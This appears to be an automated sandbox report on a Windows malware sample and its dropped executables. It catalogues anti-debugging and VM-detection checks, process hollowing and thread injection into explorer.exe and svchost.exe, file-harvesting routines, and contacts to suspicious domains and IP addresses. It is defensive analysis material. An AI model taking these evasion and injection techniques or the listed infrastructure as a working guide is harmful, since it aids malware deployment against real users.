Source: C:\Users\user\AppData\Local\Temp\13E2.exe TID: 5712	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\952.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\952.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\AppData\Local\Temp\13E2.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 572
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 386

Source: C:\Users\user\AppData\Local\Temp\2819.exe	API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	API coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\952.exe	API coverage: 9.6 %

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_00586CF0

Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B1F6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6B74.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7E61.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\45F8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CA61.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5F8C.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9054.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\952.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Local\Temp\952.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\952.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\13E2.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000003.00000000.294064250.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000002.607855715.0000013839890000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000000.261600707.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000A.00000003.302988191.00000159C226C000.00000004.00000001.sdmp	Binary or memory string: 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
Source: svchost.exe, 00000002.00000002.640514055.000001F8DF662000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000010.00000002.607855715.0000013839890000.00000004.00000001.sdmp	Binary or memory string: VMware7,1
Source: svchost.exe, 00000002.00000002.582567368.000001F8D9E2A000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.639615437.000001F8DF64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.574484740.00000159C226D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302843963.00000159C226C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303134586.00000159C226D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302988191.00000159C226C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303061026.00000159C226D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303206364.00000159C226C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.585731929.00000159C22D5000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.566259297.00000159C222A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.421058457.0000000005382000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.424965095.0000000003518000.00000004.00000020.sdmp, WerFault.exe, 0000001B.00000003.421280412.0000000005382000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.571256682.0000024F6C402000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000003.00000000.292819293.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.300341467.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.261897503.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.300341467.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: svchost.exe, 00000009.00000002.578606609.0000024F6C43C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.610402558.00000139B4E67000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.579577189.0000015B93A29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WerFault.exe, 0000001B.00000003.418858393.0000000005381000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00588A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00586090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\emPJndhuvA.exe

System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\tiftjuh	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00520083 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00530042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00450083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00460042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_0208092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_02080D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00450083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00460042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_0040C180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00560083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_0058092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00581250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_0058C3D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00580D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: 30_2_00530083 push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\tiftjuh	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_004034DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_004048D0 VirtualProtect ?,00000004,00000100,00000000

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_0040F660 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

Source: C:\Users\user\AppData\Local\Temp\13E2.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Memory protected: page guard

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00408843 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_004034DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_004038E4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_0040730C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_0040795C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_0040378B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00403B94 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00408798 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: patmushta.info
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe	Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: privacy-tools-for-you-780.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Domain query: goo.su
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: tiftjuh.3.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\tiftjuh	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\tiftjuh	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe

Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1E0000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Memory written: C:\Users\user\Desktop\emPJndhuvA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\tiftjuh	Memory written: C:\Users\user\AppData\Roaming\tiftjuh base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Memory written: C:\Users\user\AppData\Local\Temp\3D67.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Memory written: C:\Users\user\AppData\Local\Temp\13E2.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 1E0000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Thread created: C:\Windows\explorer.exe EIP: 3A61930
Source: C:\Users\user\AppData\Roaming\tiftjuh	Thread created: unknown EIP: 6DC1930
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Thread created: unknown EIP: 66C1930

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 1E0000
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 25B3008

.NET source code references suspicious native API functions

Show sources

Source: 13E2.exe.3.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 13E2.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 32.0.13E2.exe.c80000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 32.0.13E2.exe.c80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 32.0.13E2.exe.c80000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 32.0.13E2.exe.c80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 32.2.13E2.exe.c80000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 32.2.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 32.0.13E2.exe.c80000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 32.0.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 32.0.13E2.exe.c80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
